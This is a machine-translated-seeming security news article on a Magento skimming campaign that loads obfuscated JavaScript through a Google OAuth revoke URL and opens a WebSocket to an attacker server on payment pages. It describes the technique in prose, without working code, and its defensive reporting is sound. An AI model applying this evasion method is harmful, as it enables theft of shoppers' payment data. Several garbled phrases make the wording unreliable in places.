- The attackers use real Google URLs to sneak malicious antivirus malware and in your non -detected browser
- This malware only activates when paying, making it a silent threat to online payments
- The script opens a websocket connection for live control, completely invisible to the average user
A new campaign of malware based on a browser has surfaced, demonstrating how attackers now exploit areas of trust like Google.com to bypass traditional antivirus defenses.
Report of C / Side safety researchers, this method is subtle, triggered under condition and difficult for users and conventional security software to detect.
It seems to come from a legitimate OAUTH URL, but secretly executes a malicious payload with full access to the user browser session.
Malware hidden at sight
The attack begins with a script integrated into a compromise electronic commerce site based on Magento which refers to an apparently harmless Google Oauth disconnection URL: https://accounts.google.com/o/oAUTH2/REVOKE.
However, this URL includes a manipulated recall parameter, which decodes and performs an obscured JavaScript payload using Eval (atob (…)).
The use of the Google domain is at the heart of deception – because the script takes care of a source of confidence, most content safety policies (CSP) and DNS filters undoubtedly allow it.
This script only activates under specific conditions. If the browser appears automated or the URL includes the word “payment”, it silently opened a websocket connection to a malicious server. This means that it can adapt a malicious behavior to the actions of users.
Any payload sent via this channel is coded, decoded and executed in base64 and executed using the JavaScript function manufacturer.
The attacker can carry out the code remotely in the browser in real time with this configuration.
One of the main factors influencing the effectiveness of this attack is its ability to escape many of the best antivirus programs currently on the market.
The logic of the script is strongly obscured and only activates under certain conditions, which makes it little likely to be detected by the best Android antivirus applications and static malware scanners.
They will not inspect, will not block or block useful JavaScript charges delivered via apparently legitimate oauth flows.
Filters or DNS firewall rules also offer limited protection, because initial demand is the legitimate domain of Google.
In the corporate environment, even some of the best termination protection tools may find it difficult to detect this activity if they are strongly based on the reputation of the field or fail to inspect the dynamic execution of the script within browsers.
While advanced users and cybersecurity teams can use content inspection proxys or behavioral analysis tools to identify anomalies like these, average users are always vulnerable.
Limiting third -party scripts, separating the browser sessions used for financial transactions and remaining vigilant about the unexpected behavior of the site could all help reduce short -term risks.
